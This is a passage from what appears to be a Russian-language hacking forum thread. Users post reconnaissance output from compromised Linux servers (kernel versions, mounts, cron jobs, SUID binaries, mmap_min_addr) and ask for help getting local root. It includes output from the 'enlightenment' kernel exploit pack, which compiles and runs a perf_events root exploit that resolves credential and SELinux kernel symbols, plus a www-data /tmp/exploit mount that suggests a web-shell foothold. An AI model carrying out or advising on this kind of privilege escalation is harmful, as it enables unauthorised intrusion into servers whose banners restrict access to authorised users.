libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so -r--r--r-- 1 root root 64678 2014-11-18 13:10:58.000000000 +0300 libdevmapper-event.a lrwxrwxrwx 1 root root 26 2014-11-19 01:08:46.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02 -r-xr-xr-x 1 root root 21856 2014-11-18 13:11:03.000000000 +0300 libdevmapper-event.so.1.02 -r--r--r-- 1 root root 717500 2014-11-18 13:10:52.000000000 +0300 libdevmapper.a lrwxrwxrwx 1 root root 20 2014-11-19 01:08:46.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02 -r-xr-xr-x 1 root root 154640 2014-11-18 13:11:03.000000000 +0300 libdevmapper.so.1.02 -rwxr-xr-x 1 root root 23360 2015-01-27 20:33:49.000000000 +0300 libdl-2.5.so lrwxrwxrwx 1 root root 12 2015-01-28 18:11:22.000000000 +0300 libdl.so.2 -> libdl-2.5.so lrwxrwxrwx 1 root root 34 2011-09-15 01:15:02.000000000 +0400 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13 -rwxr-xr-x 1 root root 22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13 -r-xr-xr-x 1 root root 22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13-17 lrwxrwxrwx 1 root root 23 2011-09-15 01:15:02.000000000 +0400 libdmraid.so -> libdmraid.so.1.0.0.rc13 -rwxr-xr-x 1 root root 212736 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13 -r-xr-xr-x 1 root root 215256 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13-17 lrwxrwxrwx 1 root root 13 2014-10-01 01:10:44.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3 -rwxr-xr-x 1 root root 26424 2014-09-18 14:12:06.000000000 +0400 libe2p.so.2.3 lrwxrwxrwx 1 root root 17 2012-06-14 01:12:05.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0 -rwxr-xr-x 1 root root 144344 2012-06-13 18:35:35.000000000 +0400 libexpat.so.0.5.0 lrwxrwxrwx 1 root root 16 2014-10-01 01:10:44.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4 -rwxr-xr-x 1 root root 122296 2014-09-18 14:12:06.000000000 +0400 libext2fs.so.2.4 -rwxr-xr-x 1 root root 58400 2014-09-18 05:58:04.000000000 +0400 libgcc_s-4.1.2-20080825.so.1 lrwxrwxrwx 1 root root 28 2014-10-01 01:10:09.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1 lrwxrwxrwx 1 root root 23 2009-09-29 10:33:39.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 647608 2009-03-25 04:47:43.000000000 +0300 libglib-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 13520 2009-03-25 04:47:43.000000000 +0300 libgmodule-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 262904 2009-03-25 04:47:43.000000000 +0300 libgobject-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 19176 2009-03-25 04:47:43.000000000 +0300 libgthread-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 31576 2007-03-15 06:16:08.000000000 +0300 libiw.so.28 -rwxr-xr-x 1 root root 9472 2007-01-06 10:55:38.000000000 +0300 libkeyutils-1.2.so lrwxrwxrwx 1 root root 18 2009-09-29 10:33:39.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so -r--r--r-- 1 root root 5902120 2014-09-17 21:57:53.000000000 +0400 liblvm2cmd.a lrwxrwxrwx 1 root root 18 2014-10-01 01:10:52.000000000 +0400 liblvm2cmd.so -> liblvm2cmd.so.2.02 -r-xr-xr-x 1 root root 804632 2014-09-17 21:57:55.000000000 +0400 liblvm2cmd.so.2.02 -rwxr-xr-x 1 root root 614992 2015-01-27 20:33:49.000000000 +0300 libm-2.5.so lrwxrwxrwx 1 root root 11 2015-01-28 18:11:22.000000000 +0300 libm.so.6 -> libm-2.5.so -rwxr-xr-x 1 root root 114352 2015-01-27 20:33:49.000000000 +0300 libnsl-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:22.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so -rwxr-xr-x 1 root root 43128 2015-01-27 20:33:49.000000000 +0300 libnss_compat-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:22.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so -rwxr-xr-x 1 root root 799680 2015-01-05 13:12:31.000000000 +0300 libnss_db-2.2.so lrwxrwxrwx 1 root root 16 2015-01-06 01:08:40.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so -rwxr-xr-x 1 root root 23736 2015-01-27 20:33:49.000000000 +0300 libnss_dns-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so -rwxr-xr-x 1 root root 53880 2015-01-27 20:33:49.000000000 +0300 libnss_files-2.5.so lrwxrwxrwx 1 root root 19 2015-01-28 18:11:22.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so -rwxr-xr-x 1 root root 24736 2015-01-27 20:33:49.000000000 +0300 libnss_hesiod-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:22.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so -rwxr-xr-x 1 root root 3185264 2015-06-15 15:38:14.000000000 +0300 libnss_ldap-2.5.so lrwxrwxrwx 1 root root 18 2015-06-16 01:09:08.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so -rwxr-xr-x 1 root root 53544 2015-01-27 20:33:49.000000000 +0300 libnss_nis-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so -rwxr-xr-x 1 root root 62944 2015-01-27 20:33:49.000000000 +0300 libnss_nisplus-2.5.so lrwxrwxrwx 1 root root 21 2015-01-28 18:11:22.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so lrwxrwxrwx 1 root root 16 2015-05-28 01:08:58.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5 -rwxr-xr-x 1 root root 46800 2015-05-27 16:48:51.000000000 +0300 libpam.so.0.81.5 lrwxrwxrwx 1 root root 21 2015-05-28 01:08:58.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2 -rwxr-xr-x 1 root root 13456 2015-05-27 16:48:51.000000000 +0300 libpam_misc.so.0.81.2 lrwxrwxrwx 1 root root 17 2015-05-28 01:08:58.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0 -rwxr-xr-x 1 root root 11264 2015-05-27 16:48:51.000000000 +0300 libpamc.so.0.81.0 lrwxrwxrwx 1 root root 16 2013-10-20 01:10:04.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1 -rwxr-xr-x 1 root root 129984 2013-10-01 22:15:48.000000000 +0400 libpcre.so.0.0.1 -rwxr-xr-x 1 root root 61248 2013-10-02 00:37:04.000000000 +0400 libproc-3.2.7.so -rwxr-xr-x 1 root root 149968 2015-01-27 20:33:50.000000000 +0300 libpthread-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so -rwxr-xr-x 1 root root 92816 2015-01-27 20:33:50.000000000 +0300 libresolv-2.5.so lrwxrwxrwx 1 root root 16 2015-01-28 18:11:22.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so -rwxr-xr-x 1 root root 53448 2015-01-27 20:33:50.000000000 +0300 librt-2.5.so lrwxrwxrwx 1 root root 12 2015-01-28 18:11:22.000000000 +0300 librt.so.1 -> librt-2.5.so -rwxr-xr-x 1 root root 95464 2011-03-06 07:48:31.000000000 +0300 libselinux.so.1 -rwxr-xr-x 1 root root 159592 2009-09-04 02:47:06.000000000 +0400 libsemanage.so.1 -rwxr-xr-x 1 root root 247496 2010-03-31 12:17:32.000000000 +0400 libsepol.so.1 lrwxrwxrwx 1 root root 12 2014-10-01 01:10:44.000000000 +0400 libss.so.2 -> libss.so.2.0 -rwxr-xr-x 1 root root 26688 2014-09-18 14:12:06.000000000 +0400 libss.so.2.0 -rwxr-xr-x 1 root root 323528 2015-05-12 23:58:28.000000000 +0300 libssl.so.0.9.8e lrwxrwxrwx 1 root root 11 2009-09-29 10:33:39.000000000 +0400 libssl.so.4 -> libssl.so.6 lrwxrwxrwx 1 root root 16 2015-05-14 01:08:43.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e lrwxrwxrwx 1 root root 19 2009-09-29 10:33:39.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8 -rwxr-xr-x 1 root root 15584 2007-01-06 19:58:47.000000000 +0300 libtermcap.so.2.0.8 -rwxr-xr-x 1 root root 36200 2015-01-27 20:33:50.000000000 +0300 libthread_db-1.0.so lrwxrwxrwx 1 root root 19 2015-01-28 18:11:22.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so -rwxr-xr-x 1 root root 18152 2015-01-27 20:33:50.000000000 +0300 libutil-2.5.so lrwxrwxrwx 1 root root 14 2015-01-28 18:11:22.000000000 +0300 libutil.so.1 -> libutil-2.5.so lrwxrwxrwx 1 root root 14 2014-10-01 01:10:44.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2 -rwxr-xr-x 1 root root 17936 2014-09-18 14:12:06.000000000 +0400 libuuid.so.1.2 lrwxrwxrwx 1 root root 22 2014-10-01 01:11:15.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0 -rwxr-xr-x 1 root root 33792 2014-09-17 22:43:42.000000000 +0400 libvolume_id.so.0.66.0 lrwxrwxrwx 1 root root 16 2009-10-23 01:10:41.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6 -rwxr-xr-x 1 root root 37368 2009-09-22 02:29:33.000000000 +0400 libwrap.so.0.7.6 lrwxrwxrwx 1 root root 13 2013-01-18 01:13:05.000000000 +0400 libz.so -> libz.so.1.2.3 lrwxrwxrwx 1 root root 13 2013-01-18 01:11:17.000000000 +0400 libz.so.1 -> libz.so.1.2.3 -rwxr-xr-x 1 root root 85544 2012-07-17 12:32:04.000000000 +0400 libz.so.1.2.3 drwxr-xr-x 2 root root 4096 2015-01-28 18:11:22.000000000 +0300 rtkaio drwxr-xr-x 4 root root 4096 2015-06-16 01:09:08.000000000 +0300 security mount Code: /dev/sda5 on / type ext3 (rw,usrquota) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/sda8 on /home type ext3 (rw,nosuid,noatime,usrquota,grpquota) /dev/sda3 on /usr type ext3 (rw,usrquota,grpquota) /dev/sda2 on /var type ext3 (rw,nosuid,usrquota,grpquota) /dev/sda1 on /boot type ext3 (rw) tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,nodev) none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1G,nr_inodes=256k) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /tmp on /tmp type none (rw,noexec,nosuid,bind) cat /etc/issue Code: This computer system is for authorized users only. Individuals using this system without authority or in excess of their authority are subject to having all their activities on this system monitored and recorded or examined by any authorized person, including law enforcement, as system personnel deem appropriate. In the course of monitoring individuals improperly using the system or in the course of system maintenance, the activities of authorized users may also be monitored and recorded. Any material so recorded may be disclosed as appropriate. Anyone using this system consents to these terms. cat /etc/crontab Code: SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # run-parts 01 * * * * root run-parts /etc/cron.hourly 02 4 * * * root run-parts /etc/cron.daily 22 4 * * 0 root run-parts /etc/cron.weekly 42 4 1 * * root run-parts /etc/cron.monthly ls -la /etc/cron.hourly Code: -rwxr-xr-x 1 root root 1683 Nov 21 2014 check_raid_status -rwxr-xr-x 1 root root 390 May 18 2011 mcelog.cron ls -la /etc/cron.daily Code: -rwxr-xr-x 1 root root 379 Mar 28 2007 0anacron lrwxrwxrwx 1 root root 39 Jan 18 2013 0logwatch -> /usr/share/logwatch/scripts/logwatch.pl -rwxr-xr-x 1 root root 118 Jan 20 20:14 cups -rwxr-xr-x 1 root root 219 Jun 6 2013 logrotate -rwxr-xr-x 1 root root 418 May 30 2012 makewhatis.cron -rwxr-xr-x 1 root root 137 Sep 3 2009 mlocate.cron -rwxr-xr-x 1 root root 2181 Jun 21 2006 prelink -rwxr-xr-x 1 root root 1746 May 14 2012 rkhunter -rwxr-xr-x 1 adegtyarev wheel 322 Sep 17 2013 rpaf_ips -rwxr-xr-x 1 root root 296 Dec 9 2014 rpm -rwxr-xr-x 1 root root 354 Aug 11 2010 tmpwatch ls -la /etc/cron.monthly Code: -rwxr-xr-x 1 root root 381 Mar 28 2007 0anacron ls -la /etc/cron.weekly Code: -rwxr-xr-x 1 root root 380 Mar 28 2007 0anacron -rwxr-xr-x 1 root root 2843 Jan 9 2013 99-raid-check -rwxr-xr-x 1 root root 414 May 30 2012 makewhatis.cron cat /proc/version Code: Linux version 2.6.18-400.1.1.el5 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-55)) #1 SMP Thu Dec 18 00:59:53 EST 2014 cat /proc/sys/vm/mmap_min_addr Code: 4096 pwd ls -la /usr/bin/staprun find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null Code: -rwsr-x--- 1 root dbus 48152 Oct 2 2013 /lib64/dbus-1/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 61656 Nov 8 2012 /bin/mount -rwsr-x--- 1 root wheel 28336 Mar 21 2012 /bin/su -rwsr-xr-x 1 root root 41592 Nov 8 2012 /bin/umount -rwsr-xr-x 1 root root 2078708 Feb 22 2012 /opt/suphp/sbin/suphp -rwsr-xr-x 1 root root 19768 May 27 16:48 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 75504 May 6 12:41 /sbin/umount.nfs4 -rwsr-xr-x 1 root root 75504 May 6 12:41 /sbin/umount.nfs -rwsr-xr-x 1 root root 75496 May 6 12:41 /sbin/mount.nfs -rwsr-x--- 1 root ecryptfs 19824 Feb 23 2012 /sbin/mount.ecryptfs_private -rwsr-xr-x 1 root root 75504 May 6 12:41 /sbin/mount.nfs4 -rwsr-xr-x 1 root root 14112 May 27 16:48 /sbin/pam_timestamp_check -rwsr-xr-x 1 root root 176616 Feb 22 2012 /usr/libexec/openssh/ssh-keysign -rwsr-xr-x 1 root root 1166176 Oct 25 2012 /usr/sbin/exim -rwsr-xr-x 1 root root 8848 Sep 22 2014 /usr/sbin/usernetctl -rwsr-xr-x 1 root root 200671 Sep 22 2014 /usr/kerberos/bin/ksu -rwsr-xr-x 1 root root 28584 Sep 17 2014 /usr/bin/newgrp -rwsr-xr-x 1 root root 120784 Oct 2 2009 /usr/bin/incrontab -rwsr-xr-x 1 root root 51752 Sep 17 2014 /usr/bin/gpasswd -rwsr-xr-x 1 root root 50696 Sep 17 2014 /usr/bin/chage -rwsr-sr-x 1 root root 315640 Feb 23 2012 /usr/bin/crontab ---s--x--x 2 root root 190912 Mar 10 2014 /usr/bin/sudoedit -rwsr-xr-x 1 root root 75264 Jan 9 2013 /usr/bin/quota -rwsr-xr-x 1 root root 15552 Nov 7 2011 /usr/bin/rlogin -rwsr-xr-x 1 root root 27936 Aug 11 2010 /usr/bin/passwd ---s--x--x 2 root root 190912 Mar 10 2014 /usr/bin/sudo -rwsr-xr-x 1 root root 20384 Nov 7 2011 /usr/bin/rcp -rwsr-xr-x 1 root root 49392 Oct 8 2014 /usr/bin/at -rws--x--x 1 root root 22200 Nov 8 2012 /usr/bin/chfn -rwsr-xr-x 1 root root 11328 Nov 7 2011 /usr/bin/rsh -rwsr-xr-x 1 root root 18606 Feb 22 2012 /usr/local/apache/bin/suexec -rwsr-xr-x 1 root root 18606 Feb 22 2012 /usr/local/apache.backup/bin/suexec
semtex.c не берет Code: $ uname -a Linux host.com 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux $ ls -la /boot total 49531 dr-xr-xr-x. 5 root root 1024 Jul 19 2013 . dr-xr-xr-x. 23 root root 4096 Jul 9 08:33 .. -rw-r--r--. 1 root root 171 Jul 17 2013 .vmlinuz-2.6.32-358.14.1.el6.x86_64.hmac -rw-r--r--. 1 root root 166 Feb 22 2013 .vmlinuz-2.6.32-358.el6.x86_64.hmac -rw-r--r--. 1 root root 2408392 Jul 17 2013 System.map-2.6.32-358.14.1.el6.x86_64 -rw-r--r--. 1 root root 2407466 Feb 22 2013 System.map-2.6.32-358.el6.x86_64 -rw-r--r--. 1 root root 104086 Jul 17 2013 config-2.6.32-358.14.1.el6.x86_64 -rw-r--r--. 1 root root 104081 Feb 22 2013 config-2.6.32-358.el6.x86_64 drwxr-xr-x. 3 root root 1024 Jul 19 2013 efi drwxr-xr-x. 2 root root 1024 Oct 15 2014 grub -rw-r--r--. 1 root root 16210951 Jul 19 2013 initramfs-2.6.32-358.14.1.el6.x86_64.img -rw-r--r--. 1 root root 16206526 Jul 19 2013 initramfs-2.6.32-358.el6.x86_64.img -rw------- 1 root root 4563905 Apr 16 02:54 initrd-2.6.32-358.14.1.el6.x86_64kdump.img drwx------. 2 root root 12288 Jul 19 2013 lost+found -rw-r--r--. 1 root root 185902 Jul 17 2013 symvers-2.6.32-358.14.1.el6.x86_64.gz -rw-r--r--. 1 root root 185734 Feb 22 2013 symvers-2.6.32-358.el6.x86_64.gz -rwxr-xr-x. 1 root root 4045680 Jul 17 2013 vmlinuz-2.6.32-358.14.1.el6.x86_64 -rwxr-xr-x. 1 root root 4043888 Feb 22 2013 vmlinuz-2.6.32-358.el6.x86_64 $ lls -la --full-time /lib $ lls -la --full-time /lib64 $ mount /dev/sda2 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw) /dev/sda1 on /boot type ext2 (rw) /dev/sda4 on /tmp type ext4 (rw,noexec,nosuid,nodev) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /tmp on /var/tmp type none (rw,noexec,nosuid,bind) $ df -h Filesystem Size Used Avail Use% Mounted on /dev/sda2 2.7T 631G 2.0T 25% / tmpfs 7.8G 0 7.8G 0% /dev/shm /dev/sda1 97M 51M 42M 55% /boot /dev/sda4 2.0G 84M 1.8G 5% /tmp $ cat /etc/issue This computer system is for authorized users only. Individuals using this system without authority or in excess of their authority are subject to having all their activities on this system monitored and recorded or examined by any authorized person, including law enforcement, as system personnel deem appropriate. In the course of monitoring individuals improperly using the system or in the course of system maintenance, the activities of authorized users may also be monitored and recorded. Any material so recorded may be disclosed as appropriate. Anyone using this system consents to these terms. $ cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed $ ls -la cron.d, $ ls -la cron.d $ ls -la cron.hourly $ ls -la cron.weekly $ cat /proc/version Linux version 2.6.32-358.14.1.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jul 16 23:51:20 UTC 2013 $ cat /proc/sys/vm/mmap_min_addr 4096 $ ls -la /usr/bin/staprun ---s--x--- 1 root stapusr 183072 Oct 15 2014 /usr/bin/staprun $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null -rws--x--x 1 root root 14280 May 27 17:00 /usr/libexec/pt_chown -rwsr-xr-x 1 abrt abrt 10296 Oct 16 2014 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache -rwsr-xr-x 1 root root 257824 Nov 13 2014 /usr/libexec/openssh/ssh-keysign -rwsr-xr-x 1 root root 14368 Oct 15 2014 /usr/libexec/polkit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 19768 Dec 20 2014 /usr/local/apache/bin/suexec -rwsr-xr-x 1 root root 19768 Dec 20 2014 /usr/local/apache.backup/bin/suexec -rws--x--x 1 root root 20184 Oct 15 2014 /usr/bin/chfn -rwsr-xr-x 1 root root 66352 Apr 7 11:52 /usr/bin/chage -rwsr-xr-x 1 root root 82752 Mar 19 2014 /usr/bin/quota -rwsr-xr-x 1 root root 71480 Apr 7 11:52 /usr/bin/gpasswd -rwsr-xr-x 1 root root 54336 Oct 18 2014 /usr/bin/at -rwsr-xr-x 1 root root 22544 Oct 15 2014 /usr/bin/pkexec ---s--x--- 1 root stapusr 183072 Oct 15 2014 /usr/bin/staprun -rwsr-xr-x. 1 root root 30768 Feb 22 2012 /usr/bin/passwd -rwsr-xr-x 1 root root 36144 Apr 7 11:52 /usr/bin/newgrp -rwsr-xr-x 1 root root 51784 Nov 23 2013 /usr/bin/crontab Compiling exp_abacus.c...OK. Compiling exp_cheddarbay.c...OK. Compiling exp_ingom0wnar.c...OK. Compiling exp_moosecox.c...OK. Compiling exp_paokara.c...OK. Compiling exp_powerglove.c...OK. Compiling exp_sieve.c...OK. Compiling exp_therebel.c...OK. Compiling exp_vmware.c...failed. Compiling exp_wunderbar.c...OK. Choose your exploit: [0] Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root [1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method) [2] Sieve: Linux 2.6.18+ move_pages() infoleak [3] Exit > 0 ------------------------------------------------------------------------------ The limits of my language are the limits of my mind. All I know is what I have words for. --Wittgenstein ------------------------------------------------------------------------------ [+] Resolved set_fs_root to 0xffffffff811b3030 (via System.map) [+] Resolved set_fs_pwd to 0xffffffff811b2fc0 (via System.map) [+] Resolved __virt_addr_valid to 0xffffffff8104bc90 (via System.map) [+] Resolved init_task to 0xffffffff81a8d020 (via System.map) [+] Resolved init_fs to 0xffffffff81ad4c40 (via System.map) [+] Resolved default_exec_domain to 0xffffffff81a9a8a0 (via System.map) [+] Resolved bad_file_ops to 0xffffffff81621300 (via System.map) [+] Resolved bad_file_aio_read to 0xffffffff8119e9e0 (via System.map) [+] Resolved ima_audit to 0xffffffff81fd4c7c (via System.map) [+] Resolved ima_file_mmap to 0xffffffff8123fa00 (via System.map) [+] Resolved ima_bprm_check to 0xffffffff8123f9c0 (via System.map) [+] Resolved ima_file_check to 0xffffffff8123f990 (via System.map) [+] Resolved selinux_enforcing to 0xffffffff81fd04c4 (via System.map) [+] Resolved selinux_enabled to 0xffffffff81ae2880 (via System.map) [+] Resolved security_ops to 0xffffffff81fcec58 (via System.map) [+] Resolved default_security_ops to 0xffffffff81aded00 (via System.map) [+] Resolved sel_read_enforce to 0xffffffff8122c120 (via System.map) [+] Resolved audit_enabled to 0xffffffff81ed6ac4 (via System.map) [+] Resolved commit_creds to 0xffffffff8109e5c0 (via System.map) [+] Resolved prepare_kernel_cred to 0xffffffff8109e840 (via System.map) [+] Resolved xen_start_info to 0xffffffff81ddf308 (via System.map) [+] Resolved ptmx_fops to 0xffffffff81fdda60 (via System.map) [+] Resolved mark_rodata_ro to 0xffffffff810459f0 (via System.map) [+] Resolved set_kernel_text_ro to 0xffffffff81045b80 (via System.map) [+] Resolved make_lowmem_page_readonly to 0xffffffff81005770 (via System.map) [+] Resolved make_lowmem_page_readwrite to 0xffffffff81005720 (via System.map) [!] Securely probing with great effort [-] System rejected creation of perf event. Either this system is patched, or a previous failed exploit was run against it.
Помогите разобраться с сие машинкой: Spoiler: uname -a Code: Linux srv007 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux Spoiler: mount Code: /dev/sda2 on / type ext3 (rw,noatime,errors=remount-ro) tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) udev on /dev type tmpfs (rw,mode=0755) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620) /dev/sda1 on /boot type ext3 (rw,noatime) /dev/sda6 on /home type ext3 (rw,nosuid,nodev,noatime,usrquota) /dev/sda5 on /var type ext3 (rw,noatime) Spoiler: cat /etc/issue Code: Debian GNU/Linux 6.0 \n \l Spoiler: cat /etc/crontab Code: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # Spoiler: cat /proc/sys/vm/mmap_min_addr Code: 65536 Spoiler: ls -la /etc/cron.hourly Code: total 16 drwxr-xr-x 2 root root 4096 Dec 23 2014 . drwxr-xr-x 104 root root 4096 Jul 17 12:12 .. -rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder -rwx------ 1 root root 317 Dec 23 2014 nginx-log-rotate Spoiler: ls -la /etc/cron.monthly Code: total 20 drwxr-xr-x 2 root root 4096 Nov 14 2011 . drwxr-xr-x 104 root root 4096 Jul 17 12:12 .. -rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder -rwxr-xr-x 1 root root 1281 Sep 28 2010 acct -rwx------ 1 root root 270 Mar 1 2011 rm_old_cronjobs.sh Spoiler: ls -la /etc/cron.monthly Code: total 24 drwxr-xr-x 2 root root 4096 Nov 14 2011 . drwxr-xr-x 104 root root 4096 Jul 17 12:12 .. -rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder -rwxr-xr-x 1 root root 895 Jan 3 2011 man-db -rwxr-xr-x 1 root root 1784 Apr 6 2010 rkhunter -rwxr-xr-x 1 root root 1133 Sep 10 2010 sysklogd GCC присутствует, но права на него отсутствуют Пробовал использовать enlightenment из шапки, результат вот: Spoiler: ./run_null_exploits.sh Code: Compiling exp_abacus.c...OK. Compiling exp_cheddarbay.c...OK. Compiling exp_ingom0wnar.c...OK. Compiling exp_moosecox.c...OK. Compiling exp_paokara.c...OK. Compiling exp_powerglove.c...OK. Compiling exp_sieve.c...OK. Compiling exp_therebel.c...OK. Compiling exp_vmware.c...OK. Compiling exp_wunderbar.c...OK. ./run_null_exploits.sh: line 61: /usr/bin/gcc: Permission denied ./run_null_exploits.sh: line 63: ./pwnkernel: No such file or directory
Ну, спасайте, господа товарищи олдфаги. Code: uname -a : Linux admin-server 2.6.32-43-generic-pae #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012 i686 GNU/Linux ls -la /boot : total 20016 drwxr-xr-x 3 root root 4096 Oct 9 2012 . drwxr-xr-x 22 root root 4096 Jul 18 15:20 .. -rw-r--r-- 1 root root 1735360 Sep 6 2012 System.map-2.6.32-43-generic-pae -rw-r--r-- 1 root root 656323 Sep 6 2012 abi-2.6.32-43-generic-pae -rw-r--r-- 1 root root 116469 Sep 6 2012 config-2.6.32-43-generic-pae drwxr-xr-x 3 root root 4096 Oct 8 2012 grub -rw-r--r-- 1 root root 13612578 Oct 9 2012 initrd.img-2.6.32-43-generic-pae -rw-r--r-- 1 root root 160280 Mar 23 2010 memtest86+.bin -rw-r--r-- 1 root root 1200 Sep 6 2012 vmcoreinfo-2.6.32-43-generic-pae -rw-r--r-- 1 root root 4183264 Sep 6 2012 vmlinuz-2.6.32-43-generic-pae lls -la --full-time /lib : (пусто) mount : /dev/sda1 on / type ext4 (rw,errors=remount-ro) proc on /proc type proc (rw,noexec,nosuid,nodev) none on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) none on /dev type devtmpfs (rw,mode=0755) none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) none on /dev/shm type tmpfs (rw,nosuid,nodev) none on /var/run type tmpfs (rw,nosuid,mode=0755) none on /var/lock type tmpfs (rw,noexec,nosuid,nodev) none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755) gvfs-fuse-daemon on /home/administrator/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=administrator) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev) /dev/fuse on /tmp/exploit||/tmp/exploit type fuse (rw,nosuid,nodev,user=www-data) /dev/fuse on /tmp/_ type fuse (rw,nosuid,nodev,user=www-data) df -h : Filesystem Size Used Avail Use% 